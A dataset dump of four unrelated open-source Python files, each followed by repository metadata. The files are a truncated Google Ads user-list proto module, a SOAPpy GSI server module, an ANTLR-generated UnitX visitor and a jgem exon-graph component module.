enum=user_list_date_rule_item_operator.UserListDateRuleItemOperatorEnum.UserListDateRuleItemOperator,
)
value = proto.Field(proto.STRING, number=4, optional=True,)
offset_in_days = proto.Field(proto.INT64, number=5, optional=True,)
class UserListNumberRuleItemInfo(proto.Message):
r"""A rule item composed of a number operation.
Attributes:
operator (google.ads.googleads.v9.enums.types.UserListNumberRuleItemOperatorEnum.UserListNumberRuleItemOperator):
Number comparison operator.
This field is required and must be populated
when creating a new number rule item.
value (float):
Number value to be compared with the
variable. This field is required and must be
populated when creating a new number rule item.
This field is a member of `oneof`_ ``_value``.
"""
operator = proto.Field(
proto.ENUM,
number=1,
enum=user_list_number_rule_item_operator.UserListNumberRuleItemOperatorEnum.UserListNumberRuleItemOperator,
)
value = proto.Field(proto.DOUBLE, number=3, optional=True,)
class UserListStringRuleItemInfo(proto.Message):
r"""A rule item composed of a string operation.
Attributes:
operator (google.ads.googleads.v9.enums.types.UserListStringRuleItemOperatorEnum.UserListStringRuleItemOperator):
String comparison operator.
This field is required and must be populated
when creating a new string rule item.
value (str):
The right hand side of the string rule item.
For URLs or referrer URLs, the value can not
contain illegal URL chars such as newlines,
quotes, tabs, or parentheses. This field is
required and must be populated when creating a
new string rule item.
This field is a member of `oneof`_ ``_value``.
"""
operator = proto.Field(
proto.ENUM,
number=1,
enum=user_list_string_rule_item_operator.UserListStringRuleItemOperatorEnum.UserListStringRuleItemOperator,
)
value = proto.Field(proto.STRING, number=3, optional=True,)
class CombinedRuleUserListInfo(proto.Message):
r"""User lists defined by combining two rules, left operand and right
operand. There are two operators: AND where left operand and right
operand have to be true; AND_NOT where left operand is true but
right operand is false.
Attributes:
left_operand (google.ads.googleads.v9.common.types.UserListRuleInfo):
Left operand of the combined rule.
This field is required and must be populated
when creating new combined rule based user list.
right_operand (google.ads.googleads.v9.common.types.UserListRuleInfo):
Right operand of the combined rule.
This field is required and must be populated
when creating new combined rule based user list.
rule_operator (google.ads.googleads.v9.enums.types.UserListCombinedRuleOperatorEnum.UserListCombinedRuleOperator):
Operator to connect the two operands.
Required for creating a combined rule user list.
"""
left_operand = proto.Field(
proto.MESSAGE, number=1, message="UserListRuleInfo",
)
right_operand = proto.Field(
proto.MESSAGE, number=2, message="UserListRuleInfo",
)
rule_operator = proto.Field(
proto.ENUM,
number=3,
enum=user_list_combined_rule_operator.UserListCombinedRuleOperatorEnum.UserListCombinedRuleOperator,
)
class DateSpecificRuleUserListInfo(proto.Message):
r"""Visitors of a page during specific dates.
Attributes:
rule (google.ads.googleads.v9.common.types.UserListRuleInfo):
Boolean rule that defines visitor of a page.
Required for creating a date specific rule user
list.
start_date (str):
Start date of users visit. If set to 2000-01-01, then the
list includes all users before end_date. The date's format
should be YYYY-MM-DD.
Required for creating a data specific rule user list.
This field is a member of `oneof`_ ``_start_date``.
end_date (str):
Last date of users visit. If set to 2037-12-30, then the
list includes all users after start_date. The date's format
should be YYYY-MM-DD.
Required for creating a data specific rule user list.
This field is a member of `oneof`_ ``_end_date``.
"""
rule = proto.Field(proto.MESSAGE, number=1, message="UserListRuleInfo",)
start_date = proto.Field(proto.STRING, number=4, optional=True,)
end_date = proto.Field(proto.STRING, number=5, optional=True,)
class ExpressionRuleUserListInfo(proto.Message):
r"""Visitors of a page. The page visit is defined by one boolean
rule expression.
Attributes:
rule (google.ads.googleads.v9.common.types.UserListRuleInfo):
Boolean rule that defines this user list. The rule consists
of a list of rule item groups and each rule item group
consists of a list of rule items. All the rule item groups
are ORed or ANDed together for evaluation based on
rule.rule_type.
Required for creating an expression rule user list.
"""
rule = proto.Field(proto.MESSAGE, number=1, message="UserListRuleInfo",)
class RuleBasedUserListInfo(proto.Message):
r"""Representation of a userlist that is generated by a rule.
This message has `oneof`_ fields (mutually exclusive fields).
For each oneof, at most one member field can be set at the same time.
Setting any member of the oneof automatically clears all other
members.
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
prepopulation_status (google.ads.googleads.v9.enums.types.UserListPrepopulationStatusEnum.UserListPrepopulationStatus):
The status of pre-population. The field is
default to NONE if not set which means the
previous users will not be considered. If set to
REQUESTED, past site visitors or app users who
match the list definition will be included in
the list (works on the Display Network only).
This will only add past users from within the
last 30 days, depending on the list's membership
duration and the date when the remarketing tag
is added. The status will be updated to FINISHED
once request is processed, or FAILED if the
request fails.
combined_rule_user_list (google.ads.googleads.v9.common.types.CombinedRuleUserListInfo):
User lists defined by combining two rules. There are two
operators: AND, where the left and right operands have to be
true; AND_NOT where left operand is true but right operand
is false.
This field is a member of `oneof`_ ``rule_based_user_list``.
date_specific_rule_user_list (google.ads.googleads.v9.common.types.DateSpecificRuleUserListInfo):
Visitors of a page during specific dates. The visiting
periods are defined as follows: Between start_date
(inclusive) and end_date (inclusive); Before end_date
(exclusive) with start_date = 2000-01-01; After start_date
(exclusive) with end_date = 2037-12-30.
This field is a member of `oneof`_ ``rule_based_user_list``.
expression_rule_user_list (google.ads.googleads.v9.common.types.ExpressionRuleUserListInfo):
Visitors of a page. The page visit is defined
by one boolean rule expression.
This field is a member of `oneof`_ ``rule_based_user_list``.
"""
prepopulation_status = proto.Field(
proto.ENUM,
number=1,
enum=user_list_prepopulation_status.UserListPrepopulationStatusEnum.UserListPrepopulationStatus,
)
combined_rule_user_list = proto.Field(
proto.MESSAGE,
number=2,
oneof="rule_based_user_list",
message="CombinedRuleUserListInfo",
)
date_specific_rule_user_list = proto.Field(
proto.MESSAGE,
number=3,
oneof="rule_based_user_list",
message="DateSpecificRuleUserListInfo",
)
expression_rule_user_list = proto.Field(
proto.MESSAGE,
number=4,
oneof="rule_based_user_list",
message="ExpressionRuleUserListInfo",
)
class LogicalUserListInfo(proto.Message):
r"""Represents a user list that is a custom combination of user
lists.
Attributes:
rules (Sequence[google.ads.googleads.v9.common.types.UserListLogicalRuleInfo]):
Logical list rules that define this user
list. The rules are defined as a logical
operator (ALL/ANY/NONE) and a list of user
lists. All the rules are ANDed when they are
evaluated.
Required for creating a logical user list.
"""
rules = proto.RepeatedField(
proto.MESSAGE, number=1, message="UserListLogicalRuleInfo",
)
class UserListLogicalRuleInfo(proto.Message):
r"""A user list logical rule. A rule has a logical operator
(and/or/not) and a list of user lists as operands.
Attributes:
operator (google.ads.googleads.v9.enums.types.UserListLogicalRuleOperatorEnum.UserListLogicalRuleOperator):
The logical operator of the rule.
rule_operands (Sequence[google.ads.googleads.v9.common.types.LogicalUserListOperandInfo]):
The list of operands of the rule.
"""
operator = proto.Field(
proto.ENUM,
number=1,
enum=user_list_logical_rule_operator.UserListLogicalRuleOperatorEnum.UserListLogicalRuleOperator,
)
rule_operands = proto.RepeatedField(
proto.MESSAGE, number=2, message="LogicalUserListOperandInfo",
)
class LogicalUserListOperandInfo(proto.Message):
r"""Operand of logical user list that consists of a user list.
Attributes:
user_list (str):
Resource name of a user list as an operand.
This field is a member of `oneof`_ ``_user_list``.
"""
user_list = proto.Field(proto.STRING, number=2, optional=True,)
class BasicUserListInfo(proto.Message):
r"""User list targeting as a collection of conversions or
remarketing actions.
Attributes:
actions (Sequence[google.ads.googleads.v9.common.types.UserListActionInfo]):
Actions associated with this user list.
"""
actions = proto.RepeatedField(
proto.MESSAGE, number=1, message="UserListActionInfo",
)
class UserListActionInfo(proto.Message):
r"""Represents an action type used for building remarketing user
lists.
This message has `oneof`_ fields (mutually exclusive fields).
For each oneof, at most one member field can be set at the same time.
Setting any member of the oneof automatically clears all other
members.
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
conversion_action (str):
A conversion action that's not generated from
remarketing.
This field is a member of `oneof`_ ``user_list_action``.
remarketing_action (str):
A remarketing action.
This field is a member of `oneof`_ ``user_list_action``.
"""
conversion_action = proto.Field(
proto.STRING, number=3, oneof="user_list_action",
)
remarketing_action = proto.Field(
proto.STRING, number=4, oneof="user_list_action",
)
__all__ = tuple(sorted(__protobuf__.manifest))
|
googleads/google-ads-python
|
google/ads/googleads/v9/common/types/user_lists.py
|
Python
|
apache-2.0
| 21,331
|
[
"VisIt"
] |
18731d9edc5a5a51af6fd2a8e36c5ade59e0798925f100b03a382c50fbf1a604
|
"""
GSIServer - Contributed by Ivan R. Judson <judson@mcs.anl.gov>
################################################################################
#
# SOAPpy - Cayce Ullman (cayce@actzero.com)
# Brian Matthews (blm@actzero.com)
# Gregory Warnes (Gregory.R.Warnes@Pfizer.com)
# Christopher Blunck (blunck@gst.com)
#
################################################################################
# Copyright (c) 2003, Pfizer
# Copyright (c) 2001, Cayce Ullman.
# Copyright (c) 2001, Brian Matthews.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of actzero, inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
################################################################################
"""
ident = '$Id: GSIServer.py 1468 2008-05-24 01:55:33Z warnes $'
from .version import __version__
#import xml.sax
import re
import socket
import sys
import socketserver
from SOAPpy.Types import *
import http.server
# SOAPpy-py3 modules
from .Parser import parseSOAPRPC
from .Config import SOAPConfig
from .Types import faultType, voidType, simplify
from .NS import NS
from .SOAPBuilder import buildSOAP
from .Utilities import debugHeader, debugFooter
try: from M2Crypto import SSL
except: pass
#####
from .Server import *
from pyGlobus.io import GSITCPSocketServer, ThreadingGSITCPSocketServer
from pyGlobus import ioc
def GSIConfig():
config = SOAPConfig()
config.channel_mode = ioc.GLOBUS_IO_SECURE_CHANNEL_MODE_GSI_WRAP
config.delegation_mode = ioc.GLOBUS_IO_SECURE_DELEGATION_MODE_FULL_PROXY
config.tcpAttr = None
config.authMethod = "_authorize"
return config
Config = GSIConfig()
class GSISOAPServer(GSITCPSocketServer, SOAPServerBase):
def __init__(self, addr = ('localhost', 8000),
RequestHandler = SOAPRequestHandler, log = 0,
encoding = 'UTF-8', config = Config, namespace = None):
# Test the encoding, raising an exception if it's not known
if encoding != None:
''.encode(encoding)
self.namespace = namespace
self.objmap = {}
self.funcmap = {}
self.encoding = encoding
self.config = config
self.log = log
self.allow_reuse_address= 1
GSITCPSocketServer.__init__(self, addr, RequestHandler,
self.config.channel_mode,
self.config.delegation_mode,
tcpAttr = self.config.tcpAttr)
def get_request(self):
sock, addr = GSITCPSocketServer.get_request(self)
return sock, addr
class ThreadingGSISOAPServer(ThreadingGSITCPSocketServer, SOAPServerBase):
def __init__(self, addr = ('localhost', 8000),
RequestHandler = SOAPRequestHandler, log = 0,
encoding = 'UTF-8', config = Config, namespace = None):
# Test the encoding, raising an exception if it's not known
if encoding != None:
''.encode(encoding)
self.namespace = namespace
self.objmap = {}
self.funcmap = {}
self.encoding = encoding
self.config = config
self.log = log
self.allow_reuse_address= 1
ThreadingGSITCPSocketServer.__init__(self, addr, RequestHandler,
self.config.channel_mode,
self.config.delegation_mode,
tcpAttr = self.config.tcpAttr)
def get_request(self):
sock, addr = ThreadingGSITCPSocketServer.get_request(self)
return sock, addr
|
cmsdaq/hltd
|
lib/SOAPpy-py3-0.52.24/src/SOAPpy/GSIServer.py
|
Python
|
lgpl-3.0
| 5,218
|
[
"Brian"
] |
5ceb737eb07b6679b49dceaa13f77a38270f430b112c9459c4b14bf3c646caec
|
# Generated from UnitX.g4 by ANTLR 4.5.1
from antlr4 import *
# This class defines a complete generic visitor for a parse tree produced by UnitXParser.
class UnitXVisitor(ParseTreeVisitor):
# Visit a parse tree produced by UnitXParser#program.
def visitProgram(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#typeDeclaration.
def visitTypeDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#functionDeclaration.
def visitFunctionDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#formalParameters.
def visitFormalParameters(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#formalParameterList.
def visitFormalParameterList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#formalParameter.
def visitFormalParameter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#block.
def visitBlock(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#blockStatement.
def visitBlockStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#statement.
def visitStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#repStatement.
def visitRepStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#ifStatement.
def visitIfStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#expressionStatement.
def visitExpressionStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#printStatement.
def visitPrintStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#assertStatement.
def visitAssertStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#dumpStatement.
def visitDumpStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#borderStatement.
def visitBorderStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#expressionList.
def visitExpressionList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#parExpression.
def visitParExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#repControl.
def visitRepControl(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#endRep.
def visitEndRep(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#expression.
def visitExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#unit.
def visitUnit(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#unitSingleOrPairOperator.
def visitUnitSingleOrPairOperator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#unitOperator.
def visitUnitOperator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#primary.
def visitPrimary(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#literal.
def visitLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#string.
def visitString(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#halfString.
def visitHalfString(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#number.
def visitNumber(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#integer.
def visitInteger(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#boolean.
def visitBoolean(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#none.
def visitNone(self, ctx):
return self.visitChildren(ctx)
|
0ED/UnitX
|
unitx/UnitXVisitor.py
|
Python
|
mit
| 4,699
|
[
"VisIt"
] |
7bd2ec3d1c4d3d9b1faf6715a4dbe2ae177e239c407da3c0e990697004b66038
|
"""
.. module:: graph
:synopsis: Graph related stuffs
.. moduleauthor:: Ken Sugino <ken.sugino@gmail.com>
"""
# system imports
from collections import Counter
import subprocess
import multiprocessing
try:
import cPickle as pickle
except:
import pickle
import gzip
import os
import time
from functools import reduce
from itertools import repeat
from operator import iadd
import logging
logging.basicConfig(level=logging.DEBUG)
LOG = logging.getLogger(__name__)
# 3rd party imports
import pandas as PD
import numpy as N
# library imports
from jgem import utils as UT
from jgem import bedtools as BT
# Graph #######################################################################
## MEGraph version 2 (no strand: start/end based)
class MEGraph2(object):
def __init__(self, sj, me, depth=500):
if '_id' not in sj.columns:
UT.set_ids(sj)
if '_id' not in me.columns:
UT.set_ids(me)
if ('st_id' not in sj.columns) or ('st_id' not in me.columns):
UT.set_pos_info(sj,me)
self.sj = sj
self.me = me
self.depth=depth
# prepare joined table
# exon[ed_id_st,e_id_st,st_id]=>junction(st_id,_id,ed_id)=>exon[ed_id,e_id_ed,st_id_ed]
metbl = me[['ed_id','_id','st_id']]
metbl_a = metbl[metbl['ed_id']!=-1].rename(columns={'st_id':'st_id_ed','_id':'e_id_ed'})
metbl_d = metbl[metbl['st_id']!=-1].rename(columns={'ed_id':'ed_id_st','_id':'e_id_st'})
sjtbl = sj[['st_id','_id','ed_id']]
# join on donor
j1 = PD.merge(metbl_d, sjtbl, how='outer', on='st_id', sort=False)
j2 = PD.merge(j1, metbl_a, how='outer', on='ed_id', sort=False)
# remove dangling exons, junctions
idxnd = j2['e_id_ed'].notnull()&j2['e_id_st'].notnull()
if N.sum(idxnd)<len(idxnd):
j2nd = j2[idxnd].copy()
else:
j2nd = j2
# groupby exon id
j2nd['e_id_st'] = j2nd['e_id_st'].astype(int)
j2nd['e_id_ed'] = j2nd['e_id_ed'].astype(int)
self.r = j2nd.groupby('e_id_ed')['e_id_st']
self.l = j2nd.groupby('e_id_st')['e_id_ed']
self.j2 = j2
self.j2nd = j2nd
self.gr = j2.groupby('ed_id')['e_id_ed'] # groupby junction right
self.gl = j2.groupby('st_id')['e_id_st'] # groupby junction left
self.exons = me
def consistent(self):
# return consistent subset of me, sj (i.e. non-dangling)
j2 = self.j2
_stids = j2[j2['e_id_ed'].isnull()]['st_id'].values
_edids = j2[j2['e_id_st'].isnull()]['ed_id'].values
me0 = me[(~me['ed_id'].isin(_edid))|(~me['st_id'].isin(_stid))]
sj0 = sj[(~sj['ed_id'].isin(_edid))|(~sj['st_id'].isin(_stid))]
return sj0, me0
def connected(self, eid, exx=None, depth=0):
#recursive version : reaches max limit with 'PR26_@myofiber_m53_1383'
if depth>self.depth:
LOG.debug('depth {0}: eid={1}'.format(depth,eid))
if exx is None:
exx = set()
exx.add(eid)
for e in self.ex_ex(eid):
if e not in exx:
exx = self.connected(e, exx, depth+1)
return exx
def allcomponents(self): # ~45sec (sid1624)
me = self.me
#me['_visited'] = False
#mei = me.set_index('_id')
#visited = mei['_visited']
# above method of recording visited node is >x300 slower
visited = set()
genes = []
tot = len(me)
for i,eid in enumerate(me['_id'].values):
# if i % 50000 == 0:
# LOG.debug('{0}/{1}...'.format(i,tot))
#if not visited.ix[eid]:
if eid not in visited:
exx = self.connected(eid)
genes.append(exx)
#visited.loc[exx] = True
visited.update(exx)
return genes
def ex_ex(self, eid):
# return exons connected to eid
return self.ex_l_ex(eid)+self.ex_r_ex(eid)
def ex_l_ex(self, eid):
# connected through donor (down-stream)
try:
return list(self.l.get_group(eid).values)
except:
return []
def ex_r_ex(self, eid):
# connected through acceptor (up-stream)
try:
return list(self.r.get_group(eid).values)
except:
return []
def connected_nr(self, eid):
# non recursive, slow? still not work for PR26 seems to be in infinite loop
to_visit = [eid]
exx = set()
depth=0
flag = False
while(len(to_visit)>0):
depth+=1
c = to_visit.pop(0)
if depth>self.depth:
flag = True
exx.add(c)
for e in self.ex_ex(c):
if (e not in exx) and (e not in to_visit):
to_visit.append(e)
if flag:
LOG.debug('eid={1} last visit = {2}: depth {0}'.format(depth,eid,c))
return exx
def allcomponents_nr(self): # ~44sec (sid1624)
me = self.me
visited = set()
genes = []
tot = len(me)
for i,eid in enumerate(me['_id'].values):
# if i % 50000 == 0:
# LOG.debug('{0}/{1}...'.format(i,tot))
if eid not in visited:
exx = self.connected_nr(eid)
genes.append(exx)
visited.update(exx)
return genes
def sj_leftex(self,st_id,flds=['st','name']):#sjrec):
try:
left = set(self.gl.get_group(st_id).values)
tmp = self.me.ix[left]
return list(tmp[tmp['_id'].notnull()][flds].values)
except:
return []
def sj_rightex(self,ed_id,flds=['ed','name']):#sjrec):
try:
right = set(self.gr.get_group(ed_id).values)
tmp = self.me.ix[right]
return list(tmp[tmp['_id'].notnull()][flds].values)
except:
return []
def sj_ex(self,sjrec,flds=['strand']):
return self.sj_leftex(sjrec['st_id'],flds)+self.sj_rightex(sjrec['ed_id'],flds)
## MEGraph version 3 (stranded: acceptor/donor based)
class MEGraph3(object):
""" acceptor/donor version, has problem if there's unstranded data """
def __init__(self, sj, me, depth=500, maxcnt=990):
UT.set_info(sj,me)
self.sj = sj
self.me = me
self.depth=depth
self.maxcnt=maxcnt
# prepare joined table
metbl = me[['a_id','_id','d_id']]
metbl_a = metbl[metbl['a_id']!=-1].rename(columns={'d_id':'d_id_a','_id':'e_id_a'})
metbl_d = metbl[metbl['d_id']!=-1].rename(columns={'a_id':'a_id_d','_id':'e_id_d'})
sjtbl = sj[['d_id','_id','a_id']]
# join on donor
j1 = PD.merge(metbl_d, sjtbl, how='outer', on='d_id', sort=False)
j2 = PD.merge(j1, metbl_a, how='outer', on='a_id', sort=False)
# remove dangling exons, junctions
j2nd = j2[j2['e_id_a'].notnull()&j2['e_id_d'].notnull()].copy()
# groupby exon id
j2nd['e_id_d'] = j2nd['e_id_d'].astype(int)
j2nd['e_id_a'] = j2nd['e_id_a'].astype(int)
self.a = j2nd.groupby('e_id_a')['e_id_d']
self.d = j2nd.groupby('e_id_d')['e_id_a']
self.j2 = j2
self.j2nd = j2nd
self.ga = j2.groupby('a_id') # groupby acceptor
self.gd = j2.groupby('d_id') # groupby donor
self.exons = me
def consistent(self):
# return consistent subset of me, sj (i.e. non-dangling)
j2 = self.j2
_dids = j2[j2['e_id_a'].isnull()]['d_id'].values
_aids = j2[j2['e_id_d'].isnull()]['a_id'].values
me0 = me[(~me['a_id'].isin(_aid))|(~me['d_id'].isin(_did))]
sj0 = sj[(~sj['a_id'].isin(_aid))|(~sj['d_id'].isin(_did))]
return sj0, me0
def _connected(self, eid, depth=0):
self._cnt +=1
#recursive version : reaches max limit with 'PR26_@myofiber_m53_1383'
if (depth>self.depth):
if self._pcnt<3:
if self._pcnt==0:
LOG.debug('-'*10)
LOG.debug('{2} depth {0}: eid={1}'.format(depth,eid,self._curreid))
self._pcnt +=1
#if exx is None:
# exx = set()
self._exx.add(eid)
if self._cnt>self.maxcnt:
LOG.debug('cnt {0} > {2} aborting eid:{1}:'.format(depth,eid,self.maxcnt))
return #exx
for e in self.ex_ex(eid):
if e not in self._exx:
self._connected(e, depth+1)
return
def connected_nr(self, eid):
# non recursive, slow? still not work for PR26 seems to be in infinite loop
to_visit = [eid]
exx = set()
depth=0
flag = False
while(len(to_visit)>0):
depth+=1
c = to_visit.pop(0)
if depth>self.depth:
flag = True
exx.add(c)
for e in self.ex_ex(c):
if (e not in exx) and (e not in to_visit):
to_visit.append(e)
if flag:
LOG.debug('eid={1} last visit = {2}: depth {0}'.format(depth,eid,c))
return exx
def allcomponents(self): # ~45sec (sid1624)
me = self.me
self.visited = visited = set()
self.genes = genes = []
tot = len(me)
for i,eid in enumerate(me['_id'].values):
# if i % 5000 == 0:
# LOG.debug('{0}/{1}...'.format(i,tot))
if eid not in visited:
visited.add(eid)
self._pcnt=0
self._cnt=0
self._exx=set()
self._curreid = eid
self._connected(eid)
genes.append(self._exx)
visited.update(self._exx)
return genes
def allcomponents_nr(self): # ~44sec (sid1624)
me = self.me
self.visited =visited = set()
self.genes = genes = []
tot = len(me)
for i,eid in enumerate(me['_id'].values):
# if i % 50000 == 0:
# LOG.debug('{0}/{1}...'.format(i,tot))
if eid not in visited:
exx = self.connected_nr(eid)
genes.append(exx)
visited.update(exx)
return genes
def connected(self, eid, depth=0):
self._pcnt=0
self._cnt=0
self._exx=set()
self._curreid = eid
self._connected(eid)
return self._exx
def ex_ex(self, eid):
# return exons connected to eid
return self.ex_d_ex(eid)+self.ex_a_ex(eid)
def ex_d_ex(self, eid):
# connected through donor (down-stream)
try:
return list(self.d.get_group(eid).values)
except:
return []
def ex_a_ex(self, eid):
# connected through acceptor (up-stream)
try:
return list(self.a.get_group(eid).values)
except:
return []
def sj_leftex(self,aid,did,strand): #sjrec):
#aid,did,strand = sjrec[['a_id','d_id','strand']]
if strand=='+':
left = self.gd.get_group(did)
return self.me.ix[set(left['e_id_d'].values)]
else:
left = self.ga.get_group(aid)
return self.me.ix[set(left['e_id_a'].values)]
def sj_rightex(self,aid,did,strand): #sjrec):
#aid,did,strand = sjrec[['a_id','d_id','strand']]
if strand=='+':
right = self.ga.get_group(aid)
return self.me.ix[set(right['e_id_a'].values)]
else:
right = self.gd.get_group(did)
return self.me.ix[set(right['e_id_d'].values)]
## MEGraph version 4 (stranded, overlap of exon also counts as connection)
class MEGraph4(MEGraph3):
def __init__(self, sj, me, filepre, depth=500, maxcnt=10000):
MEGraph3.__init__(self, sj, me, depth, maxcnt)
self.pre = filepre
a = filepre+'ex1.txt.gz'
b = filepre+'ex2.txt.gz'
c = filepre+'ov.txt.gz'
# calculate exon overlap to self
cols0 = ['chr','st','ed','strand','_id']
# single cell data contains float in st,ed in ex ???
me = UT.check_int_nan(me)
a = UT.write_pandas(me[cols0], a, '')
b = UT.write_pandas(me[cols0], b, '')
c = BT.bedtoolintersect(a,b,c,wao=True)
cols1 = cols0+['b_'+x for x in cols0]+['ovl']
self.ov = ov = UT.read_pandas(c, names=cols1)
# select same strand overlap to non-self
self.ov1 = ov1 = ov[(ov['_id']!=ov['b__id'])&(ov['strand']==ov['b_strand'])]
# make connected dictionary _id => [b__id's]
tmp = ov1.groupby('_id')['b__id'].apply(lambda x: list(x)).reset_index()
if 'index' in tmp.columns:
tmp['_id'] = tmp['index']
#LOG.debug('graph.MEGraph4.__init__: tmp.columns={0}, len(tmp)={1}'.format(tmp.columns, len(tmp)))
self.eoe = dict(UT.izipcols(tmp, ['_id','b__id']))
# cleanup
os.unlink(a)
os.unlink(b)
os.unlink(c)
def ex_ex(self, eid):
# return exons connected to eid
return self.ex_d_ex(eid)+self.ex_a_ex(eid)+self.eoe.get(eid,[])
def _worker2(s,e,c):
mg = MEGraph2(s,e)
genes = mg.allcomponents()
#LOG.debug("finished {0}...".format(c))
return genes
def _worker3(s,e,c):
mg = MEGraph3(s,e)
#genes = mg.allcomponents()
genes = mg.allcomponents_nr()
#LOG.debug("finished {0}...".format(c))
#cPickle.dump(genes, open('genes-{0}.pic'.format(c),'w'))
return genes
def _worker4(s,e,c,fp):
fpc = fp+c+'.'
mg = MEGraph4(s,e,fpc)
#genes = mg.allcomponents()
genes = mg.allcomponents_nr()
#LOG.debug("finished {0}...".format(c))
#cPickle.dump(genes, open('genes-{0}.pic'.format(c),'w'))
return genes
def worker(args):
func, arg = args
return func(*arg)
def mcore_allcomponents(sj, me, np=4, version=3, depth=500, maxcnt=10000, chroms=None, filepre=''): # ~31sec (np=1)
# np number of processes
# spawn processes to process chrom-wise
# common id
if '_id' not in sj.columns:
UT.set_ids(sj)
if '_id' not in me.columns:
UT.set_ids(me)
if version==2:
if ('st_id' not in sj.columns) or ('st_id' not in me.columns):
UT.set_pos_info(sj,me)
else:
if ('a_pos' not in sj.columns) or ('a_pos' not in me.columns):
UT.set_ad_info(sj, me)
if chroms is None:
chroms = sorted(me['chr'].unique())
if version==4:
data = [(sj[sj['chr']==c], me[me['chr']==c], c, filepre) for c in chroms]
else:
data = [(sj[sj['chr']==c], me[me['chr']==c], c) for c in chroms]
data = [x for x in data if (len(x[0])>0 and len(x[1])>0)]
if np==1:
rslts = []
for d in data:
if version==3:
s,e,c = d
LOG.debug('connected component: processing {0}...'.format(c))
mg = MEGraph3(s,e,depth=depth, maxcnt=maxcnt)
elif version==4:
s,e,c,filepre = d
LOG.debug('connected component: processing {0}...'.format(c))
mg = MEGraph4(s,e,filepre,depth=depth, maxcnt=maxcnt)
else:
s,e,c = d
LOG.debug('connected component: processing {0}...'.format(c))
mg = MEGraph2(s,e,depth=depth)
tmp = mg.allcomponents_nr()
rslts.append(tmp)
LOG.debug("finished {0}...".format(c))
#cPickle.dump(tmp, open('genes-{0}.pic'.format(c),'w'))
genes = [x for y in rslts for x in y]
else:
p = multiprocessing.Pool(np)
if version==3:
a = zip(repeat(_worker3), data)
elif version==4:
a = zip(repeat(_worker4), data)
else:
a = zip(repeat(_worker2), data)
genes = reduce(iadd, p.map(worker, a))
p.close()
#p.join()
return genes
def mcore_allcomponents2(sj, me, np=4, depth=500, maxcnt=10000, chroms=None):
return mcore_allcomponents(sj, me, np, 2, depth, maxcnt, chroms)
def mcore_allcomponents3(sj, me, np=4, depth=500, maxcnt=10000, chroms=None):
return mcore_allcomponents(sj, me, np, 3, depth, maxcnt, chroms)
def mcore_allcomponents4(sj, me, filepre, np=4, depth=500, maxcnt=10000, chroms=None):
return mcore_allcomponents(sj, me, np, 4, depth, maxcnt, chroms, filepre)
